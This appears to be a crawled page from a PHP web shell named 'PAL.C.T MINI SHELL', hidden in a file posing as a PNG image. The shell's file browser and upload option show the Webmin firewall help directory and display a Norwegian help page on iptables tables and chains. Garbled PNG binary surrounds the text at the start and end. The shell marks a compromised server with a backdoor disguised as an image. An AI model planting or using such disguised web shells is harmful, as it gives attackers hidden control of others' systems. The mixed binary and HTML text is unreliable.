php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall/help/
upload
files >> //usr/libexec/webmin/firewall/help/intro.no.auto.html

<header> Linux-brannmuren </header><h3> Modul introduksjon </h3> Denne modulen lar deg konfigurere IPtables-brannmurfunksjonene som finnes i 2.4-serien med Linux-kjerner. I motsetning til noen andre brannmurkonfigurasjonsprogrammer, i stedet for å lage et skallskript som setter opp brannmuren, leser og redigerer den en lagringsfil i formatet som er lest og skrevet av <tt>henholdsvis ipi (6) tabeller-gjenoppretting</tt> og <tt>ipi (6) -tabeller</tt> . <p> Hvis du allerede har en brannmur på systemet ditt som er konfigurert manuelt eller fra en skriptfil, vil modulen tilby å konvertere den til en IPtables-lagringsfil for deg, og lage et skript som skal kjøres ved starttidspunkt for å aktivere reglene i filen. Imidlertid, hvis du gjør dette, bør du ikke lenger redigere skriptet for brannmurregler, og bør deaktivere at det også kjører på oppstart. <p><h3> Oversikt over IPtables </h3> Hver nettverkspakke som kommer inn, går ut fra eller videresendes av systemet ditt, sjekkes mot en eller flere kjeder for å finne ut hva som vil skje med den. Hver kjede inneholder null eller flere regler, som hver har en betingelse (for å bestemme hvilke pakker den matcher) og en handling (for å kontrollere hva som skjer med de matchende pakkene). Hver kjede har også en standardhandling som kontrollerer hva som skjer med pakker som ikke samsvarer med noen regel. <p> Hver kjede er en del av et bord, hvorav det for øyeblikket er tre: <ul><li> <b>Pakkefiltrering ( <tt>filter</tt> )</b> <br> Kjedene i denne tabellen kan brukes til å kontrollere data som kommer inn i systemet ditt fra andre verter i nettverket, data sendt ut fra systemet av brukere og prosesser, og data som er videresendt av systemet ditt hvis det fungerer som en ruter. <p><li> <b>Nettverksadresse oversettelse ( <tt>nat</tt> )</b> <br> Denne tabellen kan brukes til å sette opp NAT eller maskere, noe som er nyttig hvis du vil gi et helt nettverk av maskiner tilgang til internett gjennom bare en ekte IP-adresse. <p><li> <b>Pakkeendring ( <tt>mangle</tt> )</b> <br> Denne tabellen er for å endre pakker som er videresendt av eller sendt ut fra systemet ditt. <p></ul> I tillegg til standardkjedene som er en del av hvert bord, kan du også lage dine egne kjeder som kan drives etter regler i innebygde kjeder. Dette kan være nyttig for gruppering og delingsregler som kan brukes flere steder. <p><h3> Hovedsiden </h3> Hovedsiden for denne modulen viser alle kjeder og regler fra en av de tilgjengelige tabellene valgt fra listen øverst til venstre. Nedenfor er et avsnitt for hver kjede i den gjeldende tabellen, med alle regler i hver kjede oppført og deres forhold beskrevet etter beste evne til modulen. For hver kjede kan du endre standardhandlingen ved å bruke rullegardinlisten hvis kjeden er en av de innebygde for tabellen, eller slette den med Slett kjedeknapp hvis den er brukerdefinert. <p> Du kan klikke på hvilken som helst regel i en kjede for å redigere den, klikke på pilene til høyre for hver rad for å flytte den opp eller ned, eller klikke på Legg til regel-knappen for å legge til en ny. Når du legger til eller redigerer en regel, kommer du til en side der du kan velge handlingen for hver regel, og betingelsene som handlingen utføres for. <p> Nederst på siden er det en knapp for å gjøre gjeldende brannmurkonfigurasjon aktiv, ved å laste den inn i kjernen med <tt>ipi (6) tabeller-gjenoppretting</tt> . Under det er en knapp for å gjøre det motsatte - ta konfigurasjonen som er i kjernen og gjøre den tilgjengelig for redigering. Til slutt, hvis distribusjonen støtter den, er det en knapp for å endre om brannmuren er aktivert ved starttidspunktet eller ikke. <p><h3> Filtreringskjeder </h3> For bedre samarbeid med eksterne iptables-skript kan du ekskludere individuelle kjeder fra behandlingen av brannmuren. For å gjøre dette, må du velge direkte behandling av regler i innstillingene og gå inn i en filterliste, som utelukker de aktuelle kjedene fra å behandle. Kjeder som ikke blir ekskludert fra redigering, flagges med meldingen &quot;ikke administrert av brannmur&quot;. <p><h3> IP-sett </h3> Nyere versjoner av ip (6) -bordet støtter ipset-utvidelsen. IP-sett er lister over IP-adresser i hovedminnet, som kan søkes veldig effektivt og brukes som betingelse i regler. På hovedsiden vises eksisterende IP-sett som kan brukes av regler. For øyeblikket er det imidlertid ikke mulig å administrere disse i brannmuren. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`